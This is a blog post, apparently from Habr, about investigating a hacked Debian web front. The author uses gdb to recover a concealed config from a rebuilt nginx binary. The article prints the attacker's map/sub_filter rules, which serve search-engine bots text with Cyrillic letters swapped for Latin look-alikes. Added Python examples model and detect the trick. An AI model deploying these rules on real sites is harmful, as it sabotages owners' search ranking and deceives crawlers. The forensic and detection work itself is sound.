When 'а' is not 'a'. In the wake of a hack

An unpleasant story happened to one of my friends. But as unpleasant as it was for Mikhail, it was pure entertainment for me.

I should say that my friend is a fairly advanced UNIX user: he can install MySQL and php on a system himself and write simple nginx configs.
And he has a dozen or a dozen and a half websites dedicated to construction tools.

One of these sites, dedicated to chains, sat firmly in the TOP of the search engines. The site is non-commercial, but somebody started attacking it. First DDoS, then brute force, then obscene comments and complaints sent to the hosting provider and to RKN.
Suddenly everything went quiet, and this calm turned out to be for the worse: the site slowly began to slip out of the top lines of the search results.


That was the preamble; now the admin's own story.

I was about to go to bed when the phone rang: "San, would you take a look at my server? It seems I've been hacked; I can't prove it, but the feeling hasn't left me for the third week now. Maybe it's time I got treated for paranoia?"

What followed was a half-hour conversation that can be summarised as follows:

  • the ground for an unauthorised entry was fertile;
  • an attacker could have obtained superuser rights;
  • the attack (if there was one) was aimed specifically at this site;
  • the problem spots have been fixed, and all that remains is to understand whether there was an intrusion;
  • the hack could not have affected the site's code or the databases.

About the last point.


Only the front's white (public) IP faces the world. There is no exchange between the backends and the front other than http(s); users and passwords differ, and no keys are shared. On the grey (private) addresses all ports except 80/443 are closed. The white backend IPs are known only to two users, whom Mikhail trusts completely.

Debian 9 was installed on the front, and by the time of the call the system had been cut off from the world by an external firewall and stopped.

"OK, give me access," I decided to put off sleep for an hour. "I'll have a look with my own eyes."

Here is the front:

$ grep -F PRETTY_NAME /etc/*releas*
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
$ `echo $SHELL` --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
$ nginx -v
nginx version: nginx/1.10.3
$ gdb --version
GNU gdb (Debian 8.2.1-2) 8.2.1

Looking for signs of a hack

I start the server, first in rescue mode. I mount the disks and leaf through the auth logs, shell histories, syslog and so on; where possible I check file creation dates, although I understand that a normal cracker "cleans up" after himself, and Misha had already "trampled" a lot while searching on his own.

I boot in normal mode, still not understanding exactly what to look for, and study the configs. First of all I'm interested in nginx, since, by and large, there's nothing on the front besides it.
The configs are small, neatly laid out in a dozen files; I just cat them one by one. Everything looks clean, but you never know whether I've missed some include, so let me get the full listing:

$ nginx -T
nginx: the configuration file /usr/local/etc/nginx/nginx.conf syntax is ok
nginx: configuration file /usr/local/etc/nginx/nginx.conf test is successful

I don't get it: "Where's the listing?"

$ nginx -V
nginx version: nginx/1.10.3
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module

A second question joins the question about the listing: "Why such an old version of nginx?"

Moreover, the system believes a newer version is installed:

$ dpkg -l nginx | grep "[n]ginx"
ii  nginx          1.14.2-2+deb10u1 all          small, powerful, scalable web/proxy server

I call:
- Misha, why did you rebuild nginx?
- Wait, I don't even know how to do that!
- OK, fine, go to sleep...

Nginx was clearly rebuilt, and the listing output via "-T" is hidden for a reason. There is no more doubt about the hack; one could simply accept that and (since Misha has already replaced the server with a fresh one) consider the problem solved.

And indeed, once someone has obtained root, the only sensible thing is to reinstall the system, and searching for what else is wrong there is pointless, but this time curiosity won over sleep. How can we find out what they wanted to hide from us?

Let's try tracing it:

$ strace nginx -T

Looking at it, the trace is clearly missing lines like

write(1, "/etc/nginx/nginx.conf", 21/etc/nginx/nginx.conf)   = 21
write(1, "...
write(1, "n", 1

Just for fun, let's compare the findings.

$ strace nginx -T 2>&1 | wc -l
264
$ strace nginx -t 2>&1 | wc -l
264

I assume that a piece of the code in /src/core/nginx.c

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                ngx_dump_config = 1;
                break;

was brought to the form:

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                //ngx_dump_config = 1;
                break;

or

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                ngx_dump_config = 0;
                break;

so that the listing is not shown via "-T".

But how can we look at our config?

If my guess is right and the problem is only in the ngx_dump_config variable, let's try to set it with gdb; fortunately --with-cc-opt contains -g, and hopefully the -O2 optimisation won't get in our way. At the same time, since I don't know how ngx_dump_config might be handled inside case 'T':, we won't call that block at all but set the variable while going through case 't':

Why '-t' can be used instead of '-T': the if (ngx_dump_config) block is processed inside if (ngx_test_config):

    if (ngx_test_config) {
        if (!ngx_quiet_mode) {
            ngx_log_stderr(0, "configuration file %s test is successful",
                           cycle->conf_file.data);
        }

        if (ngx_dump_config) {
            cd = cycle->config_dump.elts;

            for (i = 0; i < cycle->config_dump.nelts; i++) {

                ngx_write_stdout("# configuration file ");
                (void) ngx_write_fd(ngx_stdout, cd[i].name.data,
                                    cd[i].name.len);
                ngx_write_stdout(":" NGX_LINEFEED);

                b = cd[i].buffer;

                (void) ngx_write_fd(ngx_stdout, b->pos, b->last - b->pos);
                ngx_write_stdout(NGX_LINEFEED);
            }
        }

        return 0;
    }

Of course, if the code was changed in this part rather than in case 'T':, my method won't work.

Test nginx.conf

After the problem had already been solved experimentally, it turned out that for the malware to work a minimal nginx config of the following form is enough:

events {
}

http {
	include /etc/nginx/sites-enabled/*;
}

We'll use it in the article for brevity.

Launching the debugger

$ gdb --silent --args nginx -t
Reading symbols from nginx...done.
(gdb) break main
Breakpoint 1 at 0x1f390: file src/core/nginx.c, line 188.
(gdb) run
Starting program: nginx -t
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, main (argc=2, argv=0x7fffffffebc8) at src/core/nginx.c:188
188     src/core/nginx.c: No such file or directory.
(gdb) print ngx_dump_config=1
$1 = 1
(gdb) continue
Continuing.
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}

http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

        include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:

[Inferior 1 (process 32581) exited normally]
(gdb) quit

Step by step:

  • set a breakpoint in the main() function
  • run the program
  • change the value of the variable that controls the config output: ngx_dump_config=1
  • continue / let the program finish
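Once the dump has been recovered this way, the hunt for directives that do not belong can be scripted. The following is an added example (mine, not from the article) that scans a constructed excerpt of the dump above for sub_filter needles containing non-ASCII characters and for maps keyed on $http_user_agent; the file names and variable names are the ones the dump shows.

```python
import re

# Constructed excerpt of the dump recovered above (\u043e = Cyrillic о, \u0430 = Cyrillic а).
SAMPLE_DUMP = """\
# configuration file /etc/nginx/nginx.conf:
events {
}

http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

sub_filter_once off;
sub_filter '\u043e' $sign_o;
sub_filter '\u0430' $sign_a;
        include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:
"""

SECTION_RE = re.compile(r"^# configuration file (\S+):$")
SUB_FILTER_RE = re.compile(r"""^\s*sub_filter\s+(['"])(.*?)\1\s+(\S+?)\s*;""")
MAP_RE = re.compile(r"^\s*map\s+(\S+)\s+(\$\w+)")


def audit_config_dump(dump):
    """Return (file, line, reason) for directives that deserve a closer look."""
    findings, current = [], None
    for lineno, line in enumerate(dump.splitlines(), 1):
        m = SECTION_RE.match(line)
        if m:                       # "# configuration file X:" starts a new file
            current = m.group(1)
            continue
        m = SUB_FILTER_RE.match(line)
        if m:
            needle, replacement = m.group(2), m.group(3)
            odd = next((ch for ch in needle if ord(ch) > 127), None)
            if odd is not None:     # rewriting a non-ASCII letter is a homoglyph tell
                findings.append((current, lineno,
                                 f"sub_filter rewrites U+{ord(odd):04X} {odd!r} to {replacement}"))
            continue
        m = MAP_RE.match(line)
        if m and "$http_user_agent" in m.group(1):
            findings.append((current, lineno,
                             f"map keyed on User-Agent feeds {m.group(2)}"))
    return findings
```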

As we can see, the real config differs from ours; let's pick the parasitic part out of it:

map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

Let's look at what happens here, in order.

Detect the yandex/google User-Agent:

map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

Exclude the wordpress service pages:

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

And for requests that satisfy both conditions above

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

replace, in the text of the html pages, Cyrillic 'о' with Latin 'o' and Cyrillic 'а' with Latin 'a':

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

Yes, the whole trick is that Cyrillic 'а' != Latin 'a', just as Cyrillic 'о' != Latin 'o':


So instead of 100% normal Cyrillic text, the search engine bots receive garbage diluted with Latin 'a' and 'o'. I won't venture to discuss how this affects SEO, but it's unlikely that such a jumble of letters has a positive effect on ranking in the search results.
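To see the effect end to end, here is an added example (mine, not from the article) that re-implements the map/sub_filter chain above in Python on a constructed page body and then checks the two responses the way a defender could: the copy a crawler gets is compared with the copy a browser gets, and every word mixing Cyrillic letters with Latin 'a'/'o' is reported. One nginx detail it reproduces: sub_filter matches ignoring case, so uppercase О/А are rewritten as well.

```python
import re

# Constructed sample page body (Cyrillic text only, as a normal visitor sees it).
SAMPLE_HTML = "<p>Обзор бензопил: как выбрать цепь</p>"

# Patterns taken from the recovered config: bot User-Agents and WordPress URIs.
BOT_UA_RE = re.compile(r"yandex\.com/bots|www\.google\.com/bot\.html", re.I)
WP_URI_RE = re.compile(r"/wp-", re.I)
# Cyrillic letters the config swaps for their Latin look-alikes.
HOMOGLYPHS = {"\u043e": "o", "\u0430": "a"}   # о -> o, а -> a


def apply_parasite_filter(body, user_agent, uri):
    """Model of the map/sub_filter chain: rewrite only for bots outside /wp-."""
    sign_user_agent = 1 if BOT_UA_RE.search(user_agent) else 0
    sign_uri = 1 if WP_URI_RE.search(uri) else 0
    if (sign_user_agent, sign_uri) != (1, 0):
        return body                      # map falls through to default: no change
    for cyr, lat in HOMOGLYPHS.items():
        # sub_filter matches ignoring case, so uppercase О/А are hit as well
        body = body.replace(cyr, lat).replace(cyr.upper(), lat)
    return body


def mixed_script_words(text):
    """Words containing both Cyrillic letters and Latin a/o: the cloaking tell."""
    found = []
    for word in re.findall(r"\w+", text):
        has_cyrillic = any("\u0400" <= ch <= "\u04ff" for ch in word)
        has_latin_ao = any(ch in "ao" for ch in word)
        if has_cyrillic and has_latin_ao:
            found.append(word)
    return found


def detect_cloaking(browser_body, bot_body):
    """Compare the response a browser got with the one a crawler got."""
    if browser_body == bot_body:
        return []
    return mixed_script_words(bot_body)
```

Fetching the same URL twice, once with a browser User-Agent and once with the Googlebot one, and feeding both bodies to detect_cloaking() is the practical form of this check.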

What can I say: guys with imagination.


source: www.habr.com
